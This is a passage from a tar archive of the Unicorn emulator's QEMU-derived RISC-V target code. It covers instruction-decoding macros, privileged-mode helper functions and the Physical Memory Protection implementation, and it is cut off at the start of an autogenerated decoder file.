(op & (0x7 << 12))) /* no enum since OPC_RISC_JALR is the actual value */ #define MASK_OP_ATOMIC(op) \ (MASK_OP_MAJOR(op) | (op & ((0x7 << 12) | (0x7F << 25)))) #define MASK_OP_ATOMIC_NO_AQ_RL_SZ(op) \ (MASK_OP_MAJOR(op) | (op & (0x1F << 27))) enum { OPC_RISC_LR = OPC_RISC_ATOMIC | (0x02 << 27), OPC_RISC_SC = OPC_RISC_ATOMIC | (0x03 << 27), OPC_RISC_AMOSWAP = OPC_RISC_ATOMIC | (0x01 << 27), OPC_RISC_AMOADD = OPC_RISC_ATOMIC | (0x00 << 27), OPC_RISC_AMOXOR = OPC_RISC_ATOMIC | (0x04 << 27), OPC_RISC_AMOAND = OPC_RISC_ATOMIC | (0x0C << 27), OPC_RISC_AMOOR = OPC_RISC_ATOMIC | (0x08 << 27), OPC_RISC_AMOMIN = OPC_RISC_ATOMIC | (0x10 << 27), OPC_RISC_AMOMAX = OPC_RISC_ATOMIC | (0x14 << 27), OPC_RISC_AMOMINU = OPC_RISC_ATOMIC | (0x18 << 27), OPC_RISC_AMOMAXU = OPC_RISC_ATOMIC | (0x1C << 27), }; #define MASK_OP_SYSTEM(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_ECALL = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_EBREAK = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_ERET = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_MRTS = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_MRTH = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_HRTS = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_WFI = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_SFENCEVM = OPC_RISC_SYSTEM | (0x0 << 12), OPC_RISC_CSRRW = OPC_RISC_SYSTEM | (0x1 << 12), OPC_RISC_CSRRS = OPC_RISC_SYSTEM | (0x2 << 12), OPC_RISC_CSRRC = OPC_RISC_SYSTEM | (0x3 << 12), OPC_RISC_CSRRWI = OPC_RISC_SYSTEM | (0x5 << 12), OPC_RISC_CSRRSI = OPC_RISC_SYSTEM | (0x6 << 12), OPC_RISC_CSRRCI = OPC_RISC_SYSTEM | (0x7 << 12), }; #define MASK_OP_FP_LOAD(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_FLW = OPC_RISC_FP_LOAD | (0x2 << 12), OPC_RISC_FLD = OPC_RISC_FP_LOAD | (0x3 << 12), }; #define MASK_OP_FP_STORE(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_FSW = OPC_RISC_FP_STORE | (0x2 << 12), OPC_RISC_FSD = OPC_RISC_FP_STORE | (0x3 << 12), }; #define MASK_OP_FP_FMADD(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FMADD_S = OPC_RISC_FMADD | (0x0 << 25), OPC_RISC_FMADD_D = OPC_RISC_FMADD | (0x1 << 25), }; #define MASK_OP_FP_FMSUB(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FMSUB_S = OPC_RISC_FMSUB | (0x0 << 25), OPC_RISC_FMSUB_D = OPC_RISC_FMSUB | (0x1 << 25), }; #define MASK_OP_FP_FNMADD(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FNMADD_S = OPC_RISC_FNMADD | (0x0 << 25), OPC_RISC_FNMADD_D = OPC_RISC_FNMADD | (0x1 << 25), }; #define MASK_OP_FP_FNMSUB(op) (MASK_OP_MAJOR(op) | (op & (0x3 << 25))) enum { OPC_RISC_FNMSUB_S = OPC_RISC_FNMSUB | (0x0 << 25), OPC_RISC_FNMSUB_D = OPC_RISC_FNMSUB | (0x1 << 25), }; #define MASK_OP_FP_ARITH(op) (MASK_OP_MAJOR(op) | (op & (0x7F << 25))) enum { /* float */ OPC_RISC_FADD_S = OPC_RISC_FP_ARITH | (0x0 << 25), OPC_RISC_FSUB_S = OPC_RISC_FP_ARITH | (0x4 << 25), OPC_RISC_FMUL_S = OPC_RISC_FP_ARITH | (0x8 << 25), OPC_RISC_FDIV_S = OPC_RISC_FP_ARITH | (0xC << 25), OPC_RISC_FSGNJ_S = OPC_RISC_FP_ARITH | (0x10 << 25), OPC_RISC_FSGNJN_S = OPC_RISC_FP_ARITH | (0x10 << 25), OPC_RISC_FSGNJX_S = OPC_RISC_FP_ARITH | (0x10 << 25), OPC_RISC_FMIN_S = OPC_RISC_FP_ARITH | (0x14 << 25), OPC_RISC_FMAX_S = OPC_RISC_FP_ARITH | (0x14 << 25), OPC_RISC_FSQRT_S = OPC_RISC_FP_ARITH | (0x2C << 25), OPC_RISC_FEQ_S = OPC_RISC_FP_ARITH | (0x50 << 25), OPC_RISC_FLT_S = OPC_RISC_FP_ARITH | (0x50 << 25), OPC_RISC_FLE_S = OPC_RISC_FP_ARITH | (0x50 << 25), OPC_RISC_FCVT_W_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_WU_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_L_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_LU_S = OPC_RISC_FP_ARITH | (0x60 << 25), OPC_RISC_FCVT_S_W = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FCVT_S_WU = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FCVT_S_L = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FCVT_S_LU = OPC_RISC_FP_ARITH | (0x68 << 25), OPC_RISC_FMV_X_S = OPC_RISC_FP_ARITH | (0x70 << 25), OPC_RISC_FCLASS_S = OPC_RISC_FP_ARITH | (0x70 << 25), OPC_RISC_FMV_S_X = OPC_RISC_FP_ARITH | (0x78 << 25), /* double */ OPC_RISC_FADD_D = OPC_RISC_FP_ARITH | (0x1 << 25), OPC_RISC_FSUB_D = OPC_RISC_FP_ARITH | (0x5 << 25), OPC_RISC_FMUL_D = OPC_RISC_FP_ARITH | (0x9 << 25), OPC_RISC_FDIV_D = OPC_RISC_FP_ARITH | (0xD << 25), OPC_RISC_FSGNJ_D = OPC_RISC_FP_ARITH | (0x11 << 25), OPC_RISC_FSGNJN_D = OPC_RISC_FP_ARITH | (0x11 << 25), OPC_RISC_FSGNJX_D = OPC_RISC_FP_ARITH | (0x11 << 25), OPC_RISC_FMIN_D = OPC_RISC_FP_ARITH | (0x15 << 25), OPC_RISC_FMAX_D = OPC_RISC_FP_ARITH | (0x15 << 25), OPC_RISC_FCVT_S_D = OPC_RISC_FP_ARITH | (0x20 << 25), OPC_RISC_FCVT_D_S = OPC_RISC_FP_ARITH | (0x21 << 25), OPC_RISC_FSQRT_D = OPC_RISC_FP_ARITH | (0x2D << 25), OPC_RISC_FEQ_D = OPC_RISC_FP_ARITH | (0x51 << 25), OPC_RISC_FLT_D = OPC_RISC_FP_ARITH | (0x51 << 25), OPC_RISC_FLE_D = OPC_RISC_FP_ARITH | (0x51 << 25), OPC_RISC_FCVT_W_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_WU_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_L_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_LU_D = OPC_RISC_FP_ARITH | (0x61 << 25), OPC_RISC_FCVT_D_W = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FCVT_D_WU = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FCVT_D_L = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FCVT_D_LU = OPC_RISC_FP_ARITH | (0x69 << 25), OPC_RISC_FMV_X_D = OPC_RISC_FP_ARITH | (0x71 << 25), OPC_RISC_FCLASS_D = OPC_RISC_FP_ARITH | (0x71 << 25), OPC_RISC_FMV_D_X = OPC_RISC_FP_ARITH | (0x79 << 25), }; #define GET_B_IMM(inst) ((extract32(inst, 8, 4) << 1) \ | (extract32(inst, 25, 6) << 5) \ | (extract32(inst, 7, 1) << 11) \ | (sextract64(inst, 31, 1) << 12)) #define GET_STORE_IMM(inst) ((extract32(inst, 7, 5)) \ | (sextract64(inst, 25, 7) << 5)) #define GET_JAL_IMM(inst) ((extract32(inst, 21, 10) << 1) \ | (extract32(inst, 20, 1) << 11) \ | (extract32(inst, 12, 8) << 12) \ | (sextract64(inst, 31, 1) << 20)) #define GET_RM(inst) extract32(inst, 12, 3) #define GET_RS3(inst) extract32(inst, 27, 5) #define GET_RS1(inst) extract32(inst, 15, 5) #define GET_RS2(inst) extract32(inst, 20, 5) #define GET_RD(inst) extract32(inst, 7, 5) #define GET_IMM(inst) sextract64(inst, 20, 12) /* RVC decoding macros */ #define GET_C_IMM(inst) (extract32(inst, 2, 5) \ | (sextract64(inst, 12, 1) << 5)) #define GET_C_ZIMM(inst) (extract32(inst, 2, 5) \ | (extract32(inst, 12, 1) << 5)) #define GET_C_ADDI4SPN_IMM(inst) ((extract32(inst, 6, 1) << 2) \ | (extract32(inst, 5, 1) << 3) \ | (extract32(inst, 11, 2) << 4) \ | (extract32(inst, 7, 4) << 6)) #define GET_C_ADDI16SP_IMM(inst) ((extract32(inst, 6, 1) << 4) \ | (extract32(inst, 2, 1) << 5) \ | (extract32(inst, 5, 1) << 6) \ | (extract32(inst, 3, 2) << 7) \ | (sextract64(inst, 12, 1) << 9)) #define GET_C_LWSP_IMM(inst) ((extract32(inst, 4, 3) << 2) \ | (extract32(inst, 12, 1) << 5) \ | (extract32(inst, 2, 2) << 6)) #define GET_C_LDSP_IMM(inst) ((extract32(inst, 5, 2) << 3) \ | (extract32(inst, 12, 1) << 5) \ | (extract32(inst, 2, 3) << 6)) #define GET_C_SWSP_IMM(inst) ((extract32(inst, 9, 4) << 2) \ | (extract32(inst, 7, 2) << 6)) #define GET_C_SDSP_IMM(inst) ((extract32(inst, 10, 3) << 3) \ | (extract32(inst, 7, 3) << 6)) #define GET_C_LW_IMM(inst) ((extract32(inst, 6, 1) << 2) \ | (extract32(inst, 10, 3) << 3) \ | (extract32(inst, 5, 1) << 6)) #define GET_C_LD_IMM(inst) ((extract16(inst, 10, 3) << 3) \ | (extract16(inst, 5, 2) << 6)) #define GET_C_J_IMM(inst) ((extract32(inst, 3, 3) << 1) \ | (extract32(inst, 11, 1) << 4) \ | (extract32(inst, 2, 1) << 5) \ | (extract32(inst, 7, 1) << 6) \ | (extract32(inst, 6, 1) << 7) \ | (extract32(inst, 9, 2) << 8) \ | (extract32(inst, 8, 1) << 10) \ | (sextract64(inst, 12, 1) << 11)) #define GET_C_B_IMM(inst) ((extract32(inst, 3, 2) << 1) \ | (extract32(inst, 10, 2) << 3) \ | (extract32(inst, 2, 1) << 5) \ | (extract32(inst, 5, 2) << 6) \ | (sextract64(inst, 12, 1) << 8)) #define GET_C_SIMM3(inst) extract32(inst, 10, 3) #define GET_C_RD(inst) GET_RD(inst) #define GET_C_RS1(inst) GET_RD(inst) #define GET_C_RS2(inst) extract32(inst, 2, 5) #define GET_C_RS1S(inst) (8 + extract16(inst, 7, 3)) #define GET_C_RS2S(inst) (8 + extract16(inst, 2, 3)) #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/op_helper.c���������������������������������������������������������0000664�0000000�0000000�00000015113�14675241067�0020711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V Emulation Helpers for QEMU. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2017-2018 SiFive, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" /* Exceptions processing helpers */ void QEMU_NORETURN riscv_raise_exception(CPURISCVState *env, uint32_t exception, uintptr_t pc) { CPUState *cs = env_cpu(env); qemu_log_mask(CPU_LOG_INT, "%s: %d\n", __func__, exception); cs->exception_index = exception; cpu_loop_exit_restore(cs, pc); } void helper_raise_exception(CPURISCVState *env, uint32_t exception) { riscv_raise_exception(env, exception, 0); } target_ulong helper_csrrw(CPURISCVState *env, target_ulong src, target_ulong csr) { target_ulong val = 0; if (riscv_csrrw(env, csr, &val, src, -1) < 0) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } return val; } target_ulong helper_csrrs(CPURISCVState *env, target_ulong src, target_ulong csr, target_ulong rs1_pass) { target_ulong val = 0; if (riscv_csrrw(env, csr, &val, -1, rs1_pass ? src : 0) < 0) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } return val; } target_ulong helper_csrrc(CPURISCVState *env, target_ulong src, target_ulong csr, target_ulong rs1_pass) { target_ulong val = 0; if (riscv_csrrw(env, csr, &val, 0, rs1_pass ? src : 0) < 0) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } return val; } target_ulong helper_sret(CPURISCVState *env, target_ulong cpu_pc_deb) { target_ulong prev_priv, prev_virt, mstatus; if (!(env->priv >= PRV_S)) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } target_ulong retpc = env->sepc; if (!riscv_has_ext(env, RVC) && (retpc & 0x3)) { riscv_raise_exception(env, RISCV_EXCP_INST_ADDR_MIS, GETPC()); } if (env->priv_ver >= PRIV_VERSION_1_10_0 && get_field(env->mstatus, MSTATUS_TSR) && !(env->priv >= PRV_M)) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } mstatus = env->mstatus; if (riscv_has_ext(env, RVH) && !riscv_cpu_virt_enabled(env)) { /* We support Hypervisor extensions and virtulisation is disabled */ target_ulong hstatus = env->hstatus; prev_priv = get_field(mstatus, MSTATUS_SPP); prev_virt = get_field(hstatus, HSTATUS_SPV); hstatus = set_field(hstatus, HSTATUS_SPV, get_field(hstatus, HSTATUS_SP2V)); mstatus = set_field(mstatus, MSTATUS_SPP, get_field(hstatus, HSTATUS_SP2P)); hstatus = set_field(hstatus, HSTATUS_SP2V, 0); hstatus = set_field(hstatus, HSTATUS_SP2P, 0); mstatus = set_field(mstatus, SSTATUS_SIE, get_field(mstatus, SSTATUS_SPIE)); mstatus = set_field(mstatus, SSTATUS_SPIE, 1); env->mstatus = mstatus; env->hstatus = hstatus; if (prev_virt) { riscv_cpu_swap_hypervisor_regs(env); } riscv_cpu_set_virt_enabled(env, prev_virt); } else { prev_priv = get_field(mstatus, MSTATUS_SPP); mstatus = set_field(mstatus, env->priv_ver >= PRIV_VERSION_1_10_0 ? MSTATUS_SIE : MSTATUS_UIE << prev_priv, get_field(mstatus, MSTATUS_SPIE)); mstatus = set_field(mstatus, MSTATUS_SPIE, 1); mstatus = set_field(mstatus, MSTATUS_SPP, PRV_U); env->mstatus = mstatus; } riscv_cpu_set_mode(env, prev_priv); return retpc; } target_ulong helper_mret(CPURISCVState *env, target_ulong cpu_pc_deb) { if (!(env->priv >= PRV_M)) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } target_ulong retpc = env->mepc; if (!riscv_has_ext(env, RVC) && (retpc & 0x3)) { riscv_raise_exception(env, RISCV_EXCP_INST_ADDR_MIS, GETPC()); } target_ulong mstatus = env->mstatus; target_ulong prev_priv = get_field(mstatus, MSTATUS_MPP); target_ulong prev_virt = MSTATUS_MPV_ISSET(env); mstatus = set_field(mstatus, env->priv_ver >= PRIV_VERSION_1_10_0 ? MSTATUS_MIE : MSTATUS_UIE << prev_priv, get_field(mstatus, MSTATUS_MPIE)); mstatus = set_field(mstatus, MSTATUS_MPIE, 1); mstatus = set_field(mstatus, MSTATUS_MPP, PRV_U); #ifdef TARGET_RISCV32 env->mstatush = set_field(env->mstatush, MSTATUS_MPV, 0); #else mstatus = set_field(mstatus, MSTATUS_MPV, 0); #endif env->mstatus = mstatus; riscv_cpu_set_mode(env, prev_priv); if (riscv_has_ext(env, RVH)) { if (prev_virt) { riscv_cpu_swap_hypervisor_regs(env); } riscv_cpu_set_virt_enabled(env, prev_virt); } return retpc; } void helper_wfi(CPURISCVState *env) { CPUState *cs = env_cpu(env); bool rvs = riscv_has_ext(env, RVS); bool prv_u = env->priv == PRV_U; bool prv_s = env->priv == PRV_S; if (((prv_s || (!rvs && prv_u)) && get_field(env->mstatus, MSTATUS_TW)) || (rvs && prv_u && !riscv_cpu_virt_enabled(env))) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } else if (riscv_cpu_virt_enabled(env) && (prv_u || (prv_s && get_field(env->hstatus, HSTATUS_VTW)))) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } else { cs->halted = 1; cs->exception_index = EXCP_HLT; cpu_loop_exit(cs); } } void helper_tlb_flush(CPURISCVState *env) { CPUState *cs = env_cpu(env); if (!(env->priv >= PRV_S) || (env->priv == PRV_S && env->priv_ver >= PRIV_VERSION_1_10_0 && get_field(env->mstatus, MSTATUS_TVM))) { riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } else { tlb_flush(cs); } } void helper_uc_riscv_exit(CPURISCVState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); }�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/pmp.c���������������������������������������������������������������0000664�0000000�0000000�00000023417�14675241067�0017536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU RISC-V PMP (Physical Memory Protection) * * Author: Daire McNamara, daire.mcnamara@emdalo.com * Ivan Griffin, ivan.griffin@emdalo.com * * This provides a RISC-V Physical Memory Protection implementation * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ /* * PMP (Physical Memory Protection) is as-of-yet unused and needs testing. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" static void pmp_write_cfg(CPURISCVState *env, uint32_t addr_index, uint8_t val); static uint8_t pmp_read_cfg(CPURISCVState *env, uint32_t addr_index); static void pmp_update_rule(CPURISCVState *env, uint32_t pmp_index); /* * Accessor method to extract address matching type 'a field' from cfg reg */ static inline uint8_t pmp_get_a_field(uint8_t cfg) { uint8_t a = cfg >> 3; return a & 0x3; } /* * Check whether a PMP is locked or not. */ static inline int pmp_is_locked(CPURISCVState *env, uint32_t pmp_index) { if (env->pmp_state.pmp[pmp_index].cfg_reg & PMP_LOCK) { return 1; } /* Top PMP has no 'next' to check */ if ((pmp_index + 1u) >= MAX_RISCV_PMPS) { return 0; } /* In TOR mode, need to check the lock bit of the next pmp * (if there is a next) */ const uint8_t a_field = pmp_get_a_field(env->pmp_state.pmp[pmp_index + 1].cfg_reg); if ((env->pmp_state.pmp[pmp_index + 1u].cfg_reg & PMP_LOCK) && (PMP_AMATCH_TOR == a_field)) { return 1; } return 0; } /* * Count the number of active rules. */ static inline uint32_t pmp_get_num_rules(CPURISCVState *env) { return env->pmp_state.num_rules; } /* * Accessor to get the cfg reg for a specific PMP/HART */ static inline uint8_t pmp_read_cfg(CPURISCVState *env, uint32_t pmp_index) { if (pmp_index < MAX_RISCV_PMPS) { return env->pmp_state.pmp[pmp_index].cfg_reg; } return 0; } /* * Accessor to set the cfg reg for a specific PMP/HART * Bounds checks and relevant lock bit. */ static void pmp_write_cfg(CPURISCVState *env, uint32_t pmp_index, uint8_t val) { if (pmp_index < MAX_RISCV_PMPS) { if (!pmp_is_locked(env, pmp_index)) { env->pmp_state.pmp[pmp_index].cfg_reg = val; pmp_update_rule(env, pmp_index); } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpcfg write - locked\n"); } } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpcfg write - out of bounds\n"); } } static void pmp_decode_napot(target_ulong a, target_ulong *sa, target_ulong *ea) { /* aaaa...aaa0 8-byte NAPOT range aaaa...aa01 16-byte NAPOT range aaaa...a011 32-byte NAPOT range ... aa01...1111 2^XLEN-byte NAPOT range a011...1111 2^(XLEN+1)-byte NAPOT range 0111...1111 2^(XLEN+2)-byte NAPOT range 1111...1111 Reserved */ if (a == -1) { *sa = 0u; *ea = -1; return; } else { target_ulong t1 = ctz64(~a); target_ulong base = (a & ~(((target_ulong)1 << t1) - 1)) << 2; target_ulong range = ((target_ulong)1 << (t1 + 3)) - 1; *sa = base; *ea = base + range; } } /* Convert cfg/addr reg values here into simple 'sa' --> start address and 'ea' * end address values. * This function is called relatively infrequently whereas the check that * an address is within a pmp rule is called often, so optimise that one */ static void pmp_update_rule(CPURISCVState *env, uint32_t pmp_index) { int i; env->pmp_state.num_rules = 0; uint8_t this_cfg = env->pmp_state.pmp[pmp_index].cfg_reg; target_ulong this_addr = env->pmp_state.pmp[pmp_index].addr_reg; target_ulong prev_addr = 0u; target_ulong sa = 0u; target_ulong ea = 0u; if (pmp_index >= 1u) { prev_addr = env->pmp_state.pmp[pmp_index - 1].addr_reg; } switch (pmp_get_a_field(this_cfg)) { case PMP_AMATCH_OFF: sa = 0u; ea = -1; break; case PMP_AMATCH_TOR: sa = prev_addr << 2; /* shift up from [xx:0] to [xx+2:2] */ ea = (this_addr << 2) - 1u; break; case PMP_AMATCH_NA4: sa = this_addr << 2; /* shift up from [xx:0] to [xx+2:2] */ ea = (this_addr + 4u) - 1u; break; case PMP_AMATCH_NAPOT: pmp_decode_napot(this_addr, &sa, &ea); break; default: sa = 0u; ea = 0u; break; } env->pmp_state.addr[pmp_index].sa = sa; env->pmp_state.addr[pmp_index].ea = ea; for (i = 0; i < MAX_RISCV_PMPS; i++) { const uint8_t a_field = pmp_get_a_field(env->pmp_state.pmp[i].cfg_reg); if (PMP_AMATCH_OFF != a_field) { env->pmp_state.num_rules++; } } } static int pmp_is_in_range(CPURISCVState *env, int pmp_index, target_ulong addr) { int result = 0; if ((addr >= env->pmp_state.addr[pmp_index].sa) && (addr <= env->pmp_state.addr[pmp_index].ea)) { result = 1; } else { result = 0; } return result; } /* * Public Interface */ /* * Check if the address has required RWX privs to complete desired operation */ bool pmp_hart_has_privs(CPURISCVState *env, target_ulong addr, target_ulong size, pmp_priv_t privs, target_ulong mode) { int i = 0; int ret = -1; int pmp_size = 0; target_ulong s = 0; target_ulong e = 0; pmp_priv_t allowed_privs = 0; /* Short cut if no rules */ if (0 == pmp_get_num_rules(env)) { return true; } /* * if size is unknown (0), assume that all bytes * from addr to the end of the page will be accessed. */ if (size == 0) { #ifdef _MSC_VER pmp_size = 0 - (addr | TARGET_PAGE_MASK); #else pmp_size = -(addr | TARGET_PAGE_MASK); #endif } else { pmp_size = size; } /* 1.10 draft priv spec states there is an implicit order from low to high */ for (i = 0; i < MAX_RISCV_PMPS; i++) { s = pmp_is_in_range(env, i, addr); e = pmp_is_in_range(env, i, addr + pmp_size - 1); /* partially inside */ if ((s + e) == 1) { qemu_log_mask(LOG_GUEST_ERROR, "pmp violation - access is partially inside\n"); ret = 0; break; } /* fully inside */ const uint8_t a_field = pmp_get_a_field(env->pmp_state.pmp[i].cfg_reg); /* * If the PMP entry is not off and the address is in range, do the priv * check */ if (((s + e) == 2) && (PMP_AMATCH_OFF != a_field)) { allowed_privs = PMP_READ | PMP_WRITE | PMP_EXEC; if ((mode != PRV_M) || pmp_is_locked(env, i)) { allowed_privs &= env->pmp_state.pmp[i].cfg_reg; } if ((privs & allowed_privs) == privs) { ret = 1; break; } else { ret = 0; break; } } } /* No rule matched */ if (ret == -1) { if (mode == PRV_M) { ret = 1; /* Privileged spec v1.10 states if no PMP entry matches an * M-Mode access, the access succeeds */ } else { ret = 0; /* Other modes are not allowed to succeed if they don't * match a rule, but there are rules. We've checked for * no rule earlier in this function. */ } } return ret == 1 ? true : false; } /* * Handle a write to a pmpcfg CSP */ void pmpcfg_csr_write(CPURISCVState *env, uint32_t reg_index, target_ulong val) { int i; uint8_t cfg_val; if ((reg_index & 1) && (sizeof(target_ulong) == 8)) { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpcfg write - incorrect address\n"); return; } for (i = 0; i < sizeof(target_ulong); i++) { cfg_val = (val >> 8 * i) & 0xff; pmp_write_cfg(env, (reg_index * sizeof(target_ulong)) + i, cfg_val); } } /* * Handle a read from a pmpcfg CSP */ target_ulong pmpcfg_csr_read(CPURISCVState *env, uint32_t reg_index) { int i; target_ulong cfg_val = 0; target_ulong val = 0; for (i = 0; i < sizeof(target_ulong); i++) { val = pmp_read_cfg(env, (reg_index * sizeof(target_ulong)) + i); cfg_val |= (val << (i * 8)); } return cfg_val; } /* * Handle a write to a pmpaddr CSP */ void pmpaddr_csr_write(CPURISCVState *env, uint32_t addr_index, target_ulong val) { if (addr_index < MAX_RISCV_PMPS) { if (!pmp_is_locked(env, addr_index)) { env->pmp_state.pmp[addr_index].addr_reg = val; pmp_update_rule(env, addr_index); } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpaddr write - locked\n"); } } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpaddr write - out of bounds\n"); } } /* * Handle a read from a pmpaddr CSP */ target_ulong pmpaddr_csr_read(CPURISCVState *env, uint32_t addr_index) { target_ulong val = 0; if (addr_index < MAX_RISCV_PMPS) { val = env->pmp_state.pmp[addr_index].addr_reg; } else { qemu_log_mask(LOG_GUEST_ERROR, "ignoring pmpaddr read - out of bounds\n"); } return val; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/pmp.h���������������������������������������������������������������0000664�0000000�0000000�00000003743�14675241067�0017543�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU RISC-V PMP (Physical Memory Protection) * * Author: Daire McNamara, daire.mcnamara@emdalo.com * Ivan Griffin, ivan.griffin@emdalo.com * * This provides a RISC-V Physical Memory Protection interface * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef RISCV_PMP_H #define RISCV_PMP_H typedef enum { PMP_READ = 1 << 0, PMP_WRITE = 1 << 1, PMP_EXEC = 1 << 2, PMP_LOCK = 1 << 7 } pmp_priv_t; typedef enum { PMP_AMATCH_OFF, /* Null (off) */ PMP_AMATCH_TOR, /* Top of Range */ PMP_AMATCH_NA4, /* Naturally aligned four-byte region */ PMP_AMATCH_NAPOT /* Naturally aligned power-of-two region */ } pmp_am_t; typedef struct { target_ulong addr_reg; uint8_t cfg_reg; } pmp_entry_t; typedef struct { target_ulong sa; target_ulong ea; } pmp_addr_t; typedef struct { pmp_entry_t pmp[MAX_RISCV_PMPS]; pmp_addr_t addr[MAX_RISCV_PMPS]; uint32_t num_rules; } pmp_table_t; void pmpcfg_csr_write(CPURISCVState *env, uint32_t reg_index, target_ulong val); target_ulong pmpcfg_csr_read(CPURISCVState *env, uint32_t reg_index); void pmpaddr_csr_write(CPURISCVState *env, uint32_t addr_index, target_ulong val); target_ulong pmpaddr_csr_read(CPURISCVState *env, uint32_t addr_index); bool pmp_hart_has_privs(CPURISCVState *env, target_ulong addr, target_ulong size, pmp_priv_t priv, target_ulong mode); #endif �����������������������������unicorn-2.1.1/qemu/target/riscv/riscv32/������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020062�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/riscv32/decode_insn16.inc.c�����������������������������������������0000664�0000000�0000000�00000047116�14675241067�0023430�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_empty arg_illegal; static bool trans_illegal(DisasContext *ctx, arg_illegal *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_fld; static 